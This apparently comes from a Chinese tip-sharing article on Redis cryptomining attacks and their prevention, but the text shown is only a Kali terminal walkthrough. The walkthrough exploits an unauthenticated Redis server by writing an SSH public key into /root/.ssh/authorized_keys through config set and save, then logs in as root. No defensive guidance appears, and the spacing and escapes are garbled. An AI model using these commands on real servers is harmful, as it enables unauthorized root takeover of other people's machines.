淺析Redis挖礦原理，看看如何預防（技巧分享）

root@kali:/usr/local/src#?ssh-keygen? Generating?public/private?rsa?key?pair. Enter?file?in?which?to?save?the?key?(/root/.ssh/id_rsa):?/tmp/rediskey/id_rsa

(echo?-e?"nn";?cat?id_rsa.pub;?echo?-e?"nn";)?>?foo.txt

root@kali:/tmp/rediskey#?cat?foo.txt?  ssh-rsa?AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1?root@kali

root@kali:/tmp/rediskey#?cat?foo.txt?|redis-cli?-h?192.168.243.129?-x?set?bar OK

root@kali:/tmp/rediskey#?redis-cli?-h?192.168.243.129 192.168.243.129:6379>?get?bar "nnnssh-rsa?AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1?root@kalinnnn"

192.168.243.129:6379>?config?set?dir?/root/.ssh OK 192.168.243.129:6379>?config?get?dir 1)?"dir" 2)?"/root/.ssh" 192.168.243.129:6379>?config?set?dbfilename?"authorized_keys" OK 192.168.243.129:6379>?save OK 192.168.243.129:6379>?exit

root@kali:/tmp/rediskey#?ssh?-i?id_rsa?root@192.168.243.129 The?authenticity?of?host?'192.168.243.129?(192.168.243.129)'?can't?be?established. ECDSA?key?fingerprint?is?SHA256:XTnAL+b8HB5FL/t3ZlZqt0EfmTBgj7TI5VBU0nSHSGU. Are?you?sure?you?want?to?continue?connecting?(yes/no)??yes Warning:?Permanently?added?'192.168.243.129'?(ECDSA)?to?the?list?of?known?hosts. Linux?kali?4.19.0-kali3-amd64?#1?SMP?Debian?4.19.20-1kali1?(2019-02-14)?x86_64  Last?login:?Sun?Apr?14?20:52:40?2019?from?192.168.243.1 root@kali:~#?w